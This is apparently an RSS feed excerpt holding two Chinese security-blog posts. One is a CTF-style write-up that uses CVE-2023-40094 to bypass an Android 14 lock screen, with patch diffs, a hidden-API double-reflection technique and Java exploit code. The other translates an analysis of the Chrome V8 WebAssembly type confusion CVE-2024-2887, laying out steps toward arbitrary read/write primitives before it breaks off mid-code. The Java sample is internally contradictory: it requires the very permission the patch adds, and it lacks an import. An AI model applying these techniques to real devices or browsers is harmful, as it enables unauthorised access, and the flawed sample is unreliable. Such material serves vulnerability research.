&lt;p&gt;你的特工向你保证，他能够操纵罪犯，让其在自己的 Android 14 手机上安装一个应用程序，并在后台运行。基于这些信息，你推测可以利用漏洞 CVE-2023-40094，在合适的时机解锁手机并获取 2FA 代码。你搭建了一个模拟器，然后开始开发...&lt;/p&gt;
&lt;p&gt;&lt;em&gt;说明文件 &lt;code&gt;instructions.md&lt;/code&gt; 中提供了详细的指示。&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;2. CVE-2023-40094 分析&lt;/h2&gt;
&lt;p&gt;我们决定按照描述中提到的路径，研究 CVE-2023-40094：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;https://nvd.nist.gov/vuln/detail/CVE-2023-40094
&lt;blockquote&gt;
&lt;p&gt;在 ActivityTaskManagerService.java 的 keyguardGoingAway 中，由于缺少权限检查，可能会导致锁屏绕过。这可能导致本地权限升级，而不需要额外的执行权限。利用不需要用户交互。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;我们可以找到&lt;a href=&quot;https://android.googlesource.com/platform/frameworks/base/+/1120bc7e511710b1b774adf29ba47106292365e7%5E%21/#F0&quot;&gt;修复该漏洞的提交&lt;/a&gt;：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;diff --git a/core/java/android/app/IActivityTaskManager.aidl b/core/java/android/app/IActivityTaskManager.aidl
index fe75dd3..b709b7e 100644
--- a/core/java/android/app/IActivityTaskManager.aidl
+++ b/core/java/android/app/IActivityTaskManager.aidl
@@ -239,6 +239,7 @@
      *              {@link android.view.WindowManagerPolicyConstants#KEYGUARD_GOING_AWAY_FLAG_TO_SHADE}
      *              etc.
      */
+     @JavaPassthrough(annotation=&quot;@android.annotation.RequiresPermission(android.Manifest.permission.CONTROL_KEYGUARD)&quot;)
     void keyguardGoingAway(int flags);

     void suppressResizeConfigChanges(boolean suppress);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;以及&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;diff --git a/services/core/java/com/android/server/wm/ActivityTaskManagerService.java b/services/core/java/com/android/server/wm/ActivityTaskManagerService.java
index aa15429..71ca852 100644
--- a/services/core/java/com/android/server/wm/ActivityTaskManagerService.java
+++ b/services/core/java/com/android/server/wm/ActivityTaskManagerService.java
@@ -18,6 +18,7 @@

 import static android.Manifest.permission.BIND_VOICE_INTERACTION;
 import static android.Manifest.permission.CHANGE_CONFIGURATION;
+import static android.Manifest.permission.CONTROL_KEYGUARD;
 import static android.Manifest.permission.CONTROL_REMOTE_APP_TRANSITION_ANIMATIONS;
 import static android.Manifest.permission.INTERACT_ACROSS_USERS;
 import static android.Manifest.permission.INTERACT_ACROSS_USERS_FULL;
@@ -3394,6 +3395,7 @@

     @Override
     public void keyguardGoingAway(int flags) {
+        mAmInternal.enforceCallingPermission(CONTROL_KEYGUARD, &quot;unlock keyguard&quot;);
         enforceNotIsolatedCaller(&quot;keyguardGoingAway&quot;);
         final long token = Binder.clearCallingIdentity();
         try {
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;我们可以注意到，与 &lt;code&gt;keyguard&lt;/code&gt; 相关的函数被添加了权限控制。&lt;code&gt;keyguard&lt;/code&gt; 类似于屏幕锁定，并管理其状态：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;https://developer.android.com/reference/android/app/KeyguardManager&lt;/li&gt;
&lt;li&gt;https://stackoverflow.com/a/17689969&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;最后，我们还注意到提交描述中有这样一条消息：&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;手动验证，确认在 bug 中找到的应用程序无法成功调用 keyguardGoingAway&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;我们的策略是开发一种逻辑，能够重现此漏洞，以便通过 &lt;code&gt;keyguardGoingAway&lt;/code&gt; 函数控制屏幕的（解）锁。&lt;/p&gt;
&lt;h2&gt;3. 内部系统 API 调用&lt;/h2&gt;
&lt;p&gt;方法 &lt;a href=&quot;https://github.com/aosp-mirror/platform_frameworks_base/blob/65f47a30cffcfb22774daf343ed23d5c7464a1b5/services/core/java/com/android/server/wm/ActivityTaskManagerService.java#L3582&quot;&gt;&lt;code&gt;keyguardGoingAway&lt;/code&gt;&lt;/a&gt; 不属于 SDK 接口的一部分，例如在 Android Studio 环境中不可用。因此，无法编译调用该方法的代码，因为它未被定义。然而，我们可以使用 Java 反射在运行时调用它（动态调用）。以下是一些关于此主题的参考资料：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;https://proandroiddev.com/java-reflection-afe3d9af0d8d&lt;/li&gt;
&lt;li&gt;https://codegym.cc/groups/posts/45-reflection-api-reflection-the-dark-side-of-java&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;s&gt;不幸&lt;/s&gt;幸运的是，自 Android 9 起，Google 限制了对某些不属于经典 SDK 的函数的调用。完整列表可在此处找到：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;https://developer.android.com/guide/app-compatibility/restrictions-non-sdk-interfaces#determine-list&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;因此，&lt;a href=&quot;https://github.com/aosp-mirror/platform_frameworks_base/blob/65f47a30cffcfb22774daf343ed23d5c7464a1b5/services/core/java/com/android/server/wm/ActivityTaskManagerService.java#L3582&quot;&gt;&lt;code&gt;keyguardGoingAway&lt;/code&gt;&lt;/a&gt; 被列入了黑名单：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Landroid/app/IActivityTaskManager$Default;-&amp;gt;keyguardGoingAway(I)V,blocked
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;查看此处提供的文件：https://dl.google.com/developers/android/udc/non-sdk/hiddenapi-flags.csv?hl=fr，第 23252 行。&lt;/p&gt;
&lt;h2&gt;4. 双重反射&lt;/h2&gt;
&lt;p&gt;为了绕过设置的过滤，我们可以使用一种名为&lt;strong&gt;双重反射&lt;/strong&gt;的技术：&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;双重反射。这是一种 Java 方法。使用系统类进行反射，我们可以将调用者的身份更改为系统 [5]。我们首先利用反射来获取反射 API，称为元反射 API。此元反射 API 由系统类加载。然后，我们使用此元反射 API 来反射调用非 SDK API。此时，对非 SDK API 的调用将被视为系统调用。此外，VMRuntime 类下有一个 setHiddenApiExemptions() API（非 SDK API），可用于豁免非 SDK API 的限制。结合双重反射和 setHiddenApiExemptions()，所有非 SDK API 仍然可以通过先前的方法（即 SDK 替换、Java 反射和 JNI）访问。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;em&gt;来源：https://diaowenrui.github.io/paper/icse22-yang.pdf&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;在寻找实现这种操作的库时，我们注意到了以下 Java 模块：https://github.com/LSPosed/AndroidHiddenApiBypass/。&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;以下是一些关于实现 &lt;code&gt;AndroidHiddenApiBypass&lt;/code&gt; 的实用资源：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;https://stackoverflow.com/questions/69163511/build-was-configured-to-prefer-settings-repositories-over-project-repositories-b/71186329#71186329&lt;/li&gt;
&lt;li&gt;https://github.com/LSPosed/AndroidHiddenApiBypass/issues/22#issuecomment-1311182344&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;5. 利用&lt;/h2&gt;
&lt;p&gt;我们的首要目标是访问 &lt;code&gt;android.app.IActivityTaskManager&lt;/code&gt; 的一个实例。即使我们可以通过双重反射直接调用它，我们也希望从一个活动对象中获得它。为此，我们可以使用 &lt;code&gt;getService()&lt;/code&gt; 方法，正如在 https://diaowenrui.github.io/paper/icse22-yang.pdf 中所述，我们将以此为灵感来构建我们的调用链：&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;getService() 是恶意应用中使用最频繁的非 SDK API，旨在获取特定的系统服务。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;然而，直接调用此函数是不可能的。通过研究&lt;a href=&quot;https://github.com/aosp-mirror/platform_frameworks_base/blob/65f47a30cffcfb22774daf343ed23d5c7464a1b5/core/java/android/app/ActivityManager.java#L5324&quot;&gt;源代码&lt;/a&gt;，我们注意到了另一条调用路径：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/**
 * @hide
 */
@UnsupportedAppUsage
public static IActivityManager getService() {
    return IActivityManagerSingleton.get();
}

private static IActivityTaskManager getTaskService() {
    return ActivityTaskManager.getService();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;我们可以注意到，其中一个方法未被隐藏，并为我们提供了一个 &lt;code&gt;android.app.IActivityTaskManager$Stub$Proxy&lt;/code&gt; 的实例，其内部系统 API 定义在 &lt;a href=&quot;https://github.com/aosp-mirror/platform_frameworks_base/blob/65f47a30cffcfb22774daf343ed23d5c7464a1b5/core/java/android/app/IActivityTaskManager.aidl&quot;&gt;&lt;code&gt;android/app/IActivityTaskManager.aidl&lt;/code&gt;&lt;/a&gt; 中，并在 &lt;a href=&quot;https://github.com/aosp-mirror/platform_frameworks_base/blob/65f47a30cffcfb22774daf343ed23d5c7464a1b5/services/core/java/com/android/server/wm/ActivityTaskManagerService.java&quot;&gt;&lt;code&gt;services/core/java/com/android/server/wm/ActivityTaskManagerService.java&lt;/code&gt;&lt;/a&gt; 中实现（参见 https://www.protechtraining.com/static/slides/Deep_Dive_Into_Binder_Presentation.html#slide-10 以&lt;/p&gt;
&lt;p&gt;我们已经确定了可以通过 &lt;code&gt;ActivityTaskManager.getService()&lt;/code&gt; 方法获取 &lt;code&gt;IActivityTaskManager&lt;/code&gt; 实例的路径。接下来，我们需要使用双重反射技术来调用 &lt;code&gt;keyguardGoingAway&lt;/code&gt; 方法，从而绕过 Android 的非 SDK API 调用限制。&lt;/p&gt;
&lt;h3&gt;5.1. 实现步骤&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;引入 AndroidHiddenApiBypass 库&lt;/strong&gt;：首先，我们需要将 AndroidHiddenApiBypass 库集成到我们的项目中。这个库提供了绕过非 SDK API 限制的功能。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;获取 IActivityTaskManager 实例&lt;/strong&gt;：使用 &lt;code&gt;ActivityTaskManager.getService()&lt;/code&gt; 方法获取 &lt;code&gt;IActivityTaskManager&lt;/code&gt; 的实例。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;使用双重反射调用 keyguardGoingAway&lt;/strong&gt;：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;利用 AndroidHiddenApiBypass 库中的功能，解除对 &lt;code&gt;keyguardGoingAway&lt;/code&gt; 方法的调用限制。&lt;/li&gt;
&lt;li&gt;使用反射机制调用 &lt;code&gt;keyguardGoingAway&lt;/code&gt; 方法。&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;处理权限&lt;/strong&gt;：确保应用程序具有必要的权限（如 &lt;code&gt;CONTROL_KEYGUARD&lt;/code&gt;），以便成功调用 &lt;code&gt;keyguardGoingAway&lt;/code&gt;。&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;5.2. 代码示例&lt;/h3&gt;
&lt;p&gt;以下是一个简化的代码示例，展示了如何实现上述步骤：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import android.app.ActivityTaskManager;
import android.app.IActivityTaskManager;
import android.util.Log;
import com.android.hiddenapibypass.HiddenApiBypass;

public class KeyguardBypass {

    public static void unlockKeyguard() {
        try {
            // Step 1: Bypass hidden API restrictions
            HiddenApiBypass.addHiddenApiExemptions(&quot;L&quot;);

            // Step 2: Get IActivityTaskManager instance
            IActivityTaskManager activityTaskManager = ActivityTaskManager.getService();

            // Step 3: Use reflection to call keyguardGoingAway
            Method keyguardGoingAwayMethod = activityTaskManager.getClass().getDeclaredMethod(&quot;keyguardGoingAway&quot;, int.class);
            keyguardGoingAwayMethod.setAccessible(true);
            keyguardGoingAwayMethod.invoke(activityTaskManager, 0);

            Log.i(&quot;KeyguardBypass&quot;, &quot;Successfully called keyguardGoingAway&quot;);
        } catch (Exception e) {
            Log.e(&quot;KeyguardBypass&quot;, &quot;Failed to call keyguardGoingAway&quot;, e);
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;5.3. 注意事项&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;权限要求&lt;/strong&gt;：确保应用程序具备 &lt;code&gt;CONTROL_KEYGUARD&lt;/code&gt; 权限。这可能需要修改系统权限，或者在受控环境下测试。&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;安全性&lt;/strong&gt;：此类操作可能会违反 Android 的安全策略，建议仅在研究和合法的测试环境中使用。&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;设备兼容性&lt;/strong&gt;：由于 Android 的版本和设备差异，确保在目标设备上进行充分测试。&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;5.4. 总结&lt;/h3&gt;
&lt;p&gt;通过以上步骤，我们可以利用 CVE-2023-40094 漏洞，绕过 Android 的锁屏机制。这种方法结合了对 Android 系统内部机制的深入理解和对反射技术的巧妙应用。然而，开发人员在使用此类技术时应始终遵循法律和道德标准，以确保其应用程序的安全性和合规性。&lt;/p&gt;
</content:encoded></item><item><title>CVE-2024-2887 Chrome Type Confusion漏洞分析</title><link>https://picoorg.github.io/posts/cve-2024-2887/</link><guid isPermaLink="true">https://picoorg.github.io/posts/cve-2024-2887/</guid><description>本文主要翻译了ZDI博客内容，水平有限以理解为主，后续计划增补PoC和补丁分析。</description><pubDate>Wed, 08 May 2024 00:00:00 GMT</pubDate><content:encoded>&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#1-%E7%AE%80%E4%BB%8B&quot;&gt;1. 简介&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2-%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0&quot;&gt;2. 漏洞成因&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8&quot;&gt;3. 漏洞利用&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#31-%E6%BC%8F%E6%B4%9E%E5%BD%B1%E5%93%8D%E8%8C%83%E5%9B%B4&quot;&gt;3.1. 漏洞影响范围&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#32-%E9%80%9A%E7%94%A8webassembly-type-confusion&quot;&gt;3.2. 通用WebAssembly type confusion&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#33-%E6%95%B4%E6%95%B0%E4%B8%8B%E6%BA%A2%E5%AF%BC%E8%87%B4v8%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8&quot;&gt;3.3. 整数下溢导致V8沙箱逃逸&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#34-%E4%BB%BB%E6%84%8Fshellcode%E6%89%A7%E8%A1%8C&quot;&gt;3.4. 任意Shellcode执行&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4-%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99&quot;&gt;4. 参考资料&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;1. 简介&lt;/h1&gt;
&lt;p&gt;原文主要是介绍Pwn2Own的Master of Pwn获奖者Manfred Paul的漏洞发现和漏洞利用过程，该漏洞类型为&lt;code&gt;type confusion&lt;/code&gt;，可同时在Chrome和Edge (Chromium)触发。&lt;/p&gt;
&lt;p&gt;漏洞存在于V8 JavaScript和WebAssembly引擎中，允许绕过V8内存沙箱（&lt;a href=&quot;https://docs.google.com/document/d/1FM4fQmIhEqPG8uGp5o9A-mnPB5BOeScZYpkHjo0KKA8/edit#heading=h.xzptrog8pyxf&quot;&gt;Ubercage&lt;/a&gt;），但受限于基于进程隔离的浏览器沙箱。在演示过程中通过使用--no-sandbox移除了这个限制。&lt;/p&gt;
&lt;h1&gt;2. 漏洞成因&lt;/h1&gt;
&lt;p&gt;WebAssembly模块包含一个&lt;code&gt;Type section&lt;/code&gt;用来给出自定义heap types，在一开始只用来定义&lt;code&gt;function types/aggregate types/external types&lt;/code&gt;三种类型（原文只提到一种类型），但在引入&lt;a href=&quot;https://webassembly.github.io/gc/core/_download/WebAssembly.pdf&quot;&gt;垃圾回收（GC）提案&lt;/a&gt;后，可以定义结构体类型，允许在WebAssembly中使用复合的、堆分配的类型。&lt;/p&gt;
&lt;p&gt;通常，结构体只能引用其前面声明的结构体。但为了支持相互递归的数据结构，新增了一个特性recursive type groups，该特性支持将递归类型组整体声明而不是每个类型单独声明。在该组中，各个类型允许相互引用。&lt;/p&gt;
&lt;p&gt;据此，考虑在&lt;code&gt;v8/src/wasm/module-decoder-impl.h&lt;/code&gt;中负责从WebAssembly解析&lt;code&gt;Type section&lt;/code&gt;的函数：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// 调整了一下原文缩进
void DecodeTypeSection() { 
    TypeCanonicalizer* type_canon = GetTypeCanonicalizer(); 
    uint32_t types_count = consume_count(&quot;types count&quot;, kV8MaxWasmTypes); // (1) 
 
    for (uint32_t i = 0; ok() &amp;amp;&amp;amp; i &amp;lt; types_count; ++i) {  
        ... 
        uint8_t kind = read_u8&amp;lt;Decoder::FullValidationTag&amp;gt;(pc(), &quot;type kind&quot;);  
        size_t initial_size = module_-&amp;gt;types.size(); 
        if (kind == kWasmRecursiveTypeGroupCode) { 
            ... 
            uint32_t group_size = 
                    consume_count(&quot;recursive group size&quot;, kV8MaxWasmTypes); 
            ... 
            if (initial_size + group_size &amp;gt; kV8MaxWasmTypes) { // (2)  
                errorf(pc(), &quot;Type definition count exceeds maximum %zu&quot;, 
                    kV8MaxWasmTypes);  
                return; 
            } 
            ... 
            for (uint32_t j = 0; j &amp;lt; group_size; j++) { 
                ... 
                TypeDefinition type = consume_subtype_definition(); 
                module_-&amp;gt;types[initial_size + j] = type; 
            } 
            ... 
        } else { 
            ... 
            // Similarly to above, we need to resize types for a group of size 1. 
            module_-&amp;gt;types.resize(initial_size + 1); // (3) 
            module_-&amp;gt;isorecursive_canonical_type_ids.resize(initial_size + 1); 
            TypeDefinition type = consume_subtype_definition(); 
            if (ok()) {  
                module_-&amp;gt;types[initial_size] = type; 
                type_canon-&amp;gt;AddRecursiveSingletonGroup(module_.get()); 
            } 
        }  
    } 
    ...  
} 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;在（1）处，&lt;code&gt;kV8MaxWasmTypes = 1,000,000&lt;/code&gt;限制了&lt;code&gt;Type section&lt;/code&gt;的声明总数。在（2）处进一步检查了递归类型组的大小是否超出了限制。&lt;/p&gt;
&lt;p&gt;然而在（2）处的检查是不够的，假设在&lt;code&gt;Type section&lt;/code&gt;有两种类型声明，一种是恰好包含kV8MaxWasmTypes数量的递归类型组，另一种是非递归类型组的类型。那么（1）处的检查能够通过，因为总数为2，（2）处的检查只有第一种声明会进入，且数值刚好等于kV8MaxWasmTypes。但是在（3）处，另一种类型声明刚好触发resize，值为&lt;code&gt;kV8MaxWasmTypes + 1&lt;/code&gt;，被分配到的索引为&lt;code&gt;kV8MaxWasmTypes&lt;/code&gt;。如果有更多的非递归类型组类型声明，只会超出限制更多。&lt;/p&gt;
&lt;h1&gt;3. 漏洞利用&lt;/h1&gt;
&lt;h2&gt;3.1. 漏洞影响范围&lt;/h2&gt;
&lt;p&gt;结合V8处理WebAssembly的heap types的方式，该漏洞可以构造出非常强大的漏洞利用原语，在&lt;code&gt;v8/src/wasm/value-type.h&lt;/code&gt;中，heap types的定义如下:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class HeapType { 
    public: 
        enum Representation : uint32_t { kFunc = kV8MaxWasmTypes, 
            kEq, 
            kI31, 
            kStruct, 
            kArray, 
            kAny, 
            kExtern, 
            ... 
            kNone, 
            ... 
        };
}; 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;此处，V8假设所有用户定义的堆类型都被分配小于&lt;code&gt;kV8MaxWasmTypes&lt;/code&gt;的索引。此时，较大的索引保留给固定的内部类型，导致我们可以使用内部类型对自定义类型定义别名，导致大量的&lt;code&gt;type confusion&lt;/code&gt;机会。&lt;/p&gt;
&lt;h2&gt;3.2. 通用WebAssembly type confusion&lt;/h2&gt;
&lt;p&gt;达成&lt;code&gt;type confusion&lt;/code&gt;，我们首先考虑&lt;code&gt;struct.new&lt;/code&gt;操作，它生成新结构体对象的引用，参数来自于栈上数据。调用者通过传递其类型索引来指定所需的结构类型。对类型索引的检查可以在&lt;code&gt;v8/src/wasm/function-body-decoder-impl.h&lt;/code&gt;中找到：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bool Validate(const uint8_t* pc, StructIndexImmediate&amp;amp; imm) {  
    if (!VALIDATE(module_-&amp;gt;has_struct(imm.index))) { 
        DecodeError(pc, &quot;invalid struct index: %u&quot;, imm.index); 
        return false;  
    } 
    imm.struct_type = module_-&amp;gt;struct_type(imm.index); 
    return true;  
} 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;接下来的验证逻辑是&lt;code&gt;has_struct()&lt;/code&gt;函数在&lt;code&gt;v8/src/wasm/wasm-module.h&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bool has_struct(uint32_t index) const { 
    return index &amp;lt; types.size() &amp;amp;&amp;amp; types[index].kind == TypeDefinition::kStruct;  
} 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;由于我们可以使&lt;code&gt;types.size() &amp;gt; kV8MaxWasmTypes&lt;/code&gt;，因此即使传递大于该值的索引，也可以使检查通过。这允许我们创建任意内部类型的引用，该引用指向我们可以自定义的结构。&lt;/p&gt;
&lt;p&gt;另一方面，考虑&lt;code&gt;ref.cast&lt;/code&gt;指令的处理：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
case kExprRefCast: 
case kExprRefCastNull: {
        ...
        Value obj = Pop();

        HeapType target_type = imm.type;
        ...
        if (V8_UNLIKELY(TypeCheckAlwaysSucceeds(obj, target_type))) {
            if (obj.type.is_nullable() &amp;amp;&amp;amp; !null_succeeds) {
                CALL_INTERFACE(AssertNotNullTypecheck, obj, value);
            } else {
                CALL_INTERFACE(Forward, obj, value);
            }
        }
        ...
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;这里，可通过构造使&lt;code&gt;TypeCheckAlwaysSucceeds&lt;/code&gt;函数返回&lt;code&gt;true&lt;/code&gt;来避免类型检查，并且该值将被简单地解释为目标类型。函数&lt;code&gt;TypeCheckAlwaysSucceeds&lt;/code&gt;最终调用&lt;code&gt;v8/src/wasm/wasm-subtyping.cc&lt;/code&gt;中定义的 &lt;code&gt;IsHeapSubtypeOfImpl&lt;/code&gt;：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;V8_NOINLINE V8_EXPORT_PRIVATE bool IsHeapSubtypeOfImpl( 
    HeapType sub_heap, HeapType super_heap, 
    const WasmModule* sub_module, const WasmModule* super_module) { 
    if (IsShared(sub_heap, sub_module) != IsShared(super_heap, super_module)) { 
        return false;  
    } 
    HeapType::Representation sub_repr_non_shared = 
        sub_heap.representation_non_shared(); 
    HeapType::Representation super_repr_non_shared = 
        super_heap.representation_non_shared(); 
    switch (sub_repr_non_shared) {  
        ... 
        case HeapType::kNone: 
            // none is a subtype of every non-func, non-extern and non-exn reference  
            // type under wasm-gc. 
            if (super_heap.is_index()) { 
                return !super_module-&amp;gt;has_signature(super_heap.ref_index()); 
            } 
            ... 
    } 
    ...  
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;这意味着，如果我们声明的类型索引为常量&lt;code&gt;HeapType::kNone&lt;/code&gt;的别名，那么当我们强制转换为任何非函数、非外部引用时，类型检查将始终被忽略。整体上，我们可以通过以下步骤，将引用类型转换为任意其他引用类型：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;在&lt;code&gt;Type section&lt;/code&gt;中，定义一个只有一个&lt;code&gt;anyref&lt;/code&gt;类型字段的结构体，并利用上述漏洞使该结构索引为&lt;code&gt;HeapType::kNone&lt;/code&gt;。&lt;/li&gt;
&lt;li&gt;将原始类型的非空引用放在栈顶，并调用&lt;code&gt;struct.new&lt;/code&gt;并将类型索引设置为&lt;code&gt;HeapType::kNone&lt;/code&gt;。（我理解为调用构造函数）&lt;/li&gt;
&lt;li&gt;同时，定义一个只有一个目标类型字段的结构体，该索引小于&lt;code&gt;kV8MaxWasmTypes&lt;/code&gt;。使用&lt;code&gt;ref.cast&lt;/code&gt;将步骤2中实例化的对象转为新结构体类型。&lt;/li&gt;
&lt;li&gt;最后，通过执行&lt;code&gt;struct.get&lt;/code&gt;读存储在结构体中的字段，即步骤2中栈上的引用，该引用已从原始类型转为目标类型。&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;这种将引用类型转换为任意其他引用类型，然后通过解引用将值类型转换为任意其他值类型 - 因此这是一种通用&lt;code&gt;type confusion&lt;/code&gt;。&lt;/p&gt;
&lt;p&gt;特别是，它直接包含几乎所有常见的&lt;code&gt;JavaScript&lt;/code&gt;引擎漏洞利用原语：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;将&lt;code&gt;int&lt;/code&gt;转换为&lt;code&gt;int*&lt;/code&gt;，然后解引用会导致任意读取。&lt;/li&gt;
&lt;li&gt;将&lt;code&gt;int&lt;/code&gt;转换为&lt;code&gt;int*&lt;/code&gt;，然后写入该引用会导致任意写入。&lt;/li&gt;
&lt;li&gt;将&lt;code&gt;externref&lt;/code&gt;转换为&lt;code&gt;int&lt;/code&gt;是&lt;code&gt;addrOf()&lt;/code&gt;原语，获取&lt;code&gt;JavaScript&lt;/code&gt;对象的地址。&lt;/li&gt;
&lt;li&gt;将&lt;code&gt;int&lt;/code&gt;转换为&lt;code&gt;externref&lt;/code&gt;是&lt;code&gt;fakeObj()&lt;/code&gt;原语，强制引擎将任意值视为指向&lt;code&gt;JavaScript&lt;/code&gt;对象的指针。&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;虽然不允许从&lt;code&gt;HeapType::kNone&lt;/code&gt;转换为&lt;code&gt;externref&lt;/code&gt;，但我们实际上通过包装引用到结构体间接操作完成&lt;code&gt;type confusion&lt;/code&gt;。&lt;/p&gt;
&lt;p&gt;这些任意读/写仍然包含在V8内存沙箱中，因为所有涉及的指向堆分配结构的指针都已标记，是沙箱化的压缩指针，而不是完整的64位原始指针。&lt;/p&gt;
&lt;h2&gt;3.3. 整数下溢导致V8沙箱逃逸&lt;/h2&gt;
&lt;p&gt;在V8沙箱内，我们可操作空间十分有限，诸如&lt;code&gt;WebAssembly&lt;/code&gt;实例之类的“受信任”对象尚无法被操作，因此仍需进行V8沙箱逃逸。&lt;/p&gt;
&lt;p&gt;&lt;code&gt;JavaScript&lt;/code&gt;引擎漏洞利用的一个常用对象是&lt;code&gt;ArrayBuffer&lt;/code&gt;及其相应views（即&lt;code&gt;TypedArray&lt;/code&gt;），因为它允许直接、无标记地访问某些内存区域。&lt;/p&gt;
&lt;p&gt;为了防止访问V8沙箱外部的指针，用沙箱化指针对&lt;code&gt;TypedArray&lt;/code&gt;进行访问限制。同时，&lt;code&gt;ArrayBuffer&lt;/code&gt;的长度字段始终存在“有限大小访问”限制，本质上是&lt;code&gt;2^53-1&lt;/code&gt;。（参考&lt;a href=&quot;https://stackoverflow.com/questions/17823225/do-arraybuffers-have-a-maximum-length&quot;&gt;StackOverflow&lt;/a&gt;，原文此处有误）&lt;/p&gt;
&lt;p&gt;然而，在现代&lt;code&gt;JavaScript&lt;/code&gt;中，由于引入了可调整大小的&lt;code&gt;ArrayBuffer(RAB)&lt;/code&gt;及其可共享变体、可增长的&lt;code&gt;SharedArrayBuffer(GSAB)&lt;/code&gt;，&lt;code&gt;TypedArray&lt;/code&gt;的处理变得相当复杂。这两种变体都具有在创建对象后更改其长度的能力，并且共享变体被限制为永不缩容。特别是，对于具有此类缓冲区的&lt;code&gt;TypedArray&lt;/code&gt;，数组长度永远无法被缓存，并且必须在每次访问时重新计算。&lt;/p&gt;
&lt;p&gt;此外，&lt;code&gt;ArrayBuffers&lt;/code&gt;还具有一个偏移字段，记录实际底层后备存储中数据的开始，计算长度时必须考虑此偏移。&lt;/p&gt;
&lt;p&gt;以下是在&lt;code&gt;Turbofan&lt;/code&gt;编译器优化后的，负责获取&lt;code&gt;TypedArray&lt;/code&gt;长度的代码，具体在&lt;code&gt;v8/src/compiler/graph-assembler.cc&lt;/code&gt;中：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TNode&amp;lt;UintPtrT&amp;gt; BuildLength(TNode&amp;lt;JSArrayBufferView&amp;gt; view, 
                              TNode&amp;lt;Context&amp;gt; context) { 
    ... 
    // 3) Length-tracking backed by RAB (JSArrayBuffer stores the length) 
    auto RabTracking = [&amp;amp;]() { 
        TNode&amp;lt;UintPtrT&amp;gt; byte_length = MachineLoadField&amp;lt;UintPtrT&amp;gt;( 
            AccessBuilder::ForJSArrayBufferByteLength(), buffer, UseInfo::Word()); 
        TNode&amp;lt;UintPtrT&amp;gt; byte_offset = MachineLoadField&amp;lt;UintPtrT&amp;gt;( 
            AccessBuilder::ForJSArrayBufferViewByteOffset(), view, 
            UseInfo::Word()); 
    
        return a
            .MachineSelectIf&amp;lt;UintPtrT&amp;gt;( // (1)  
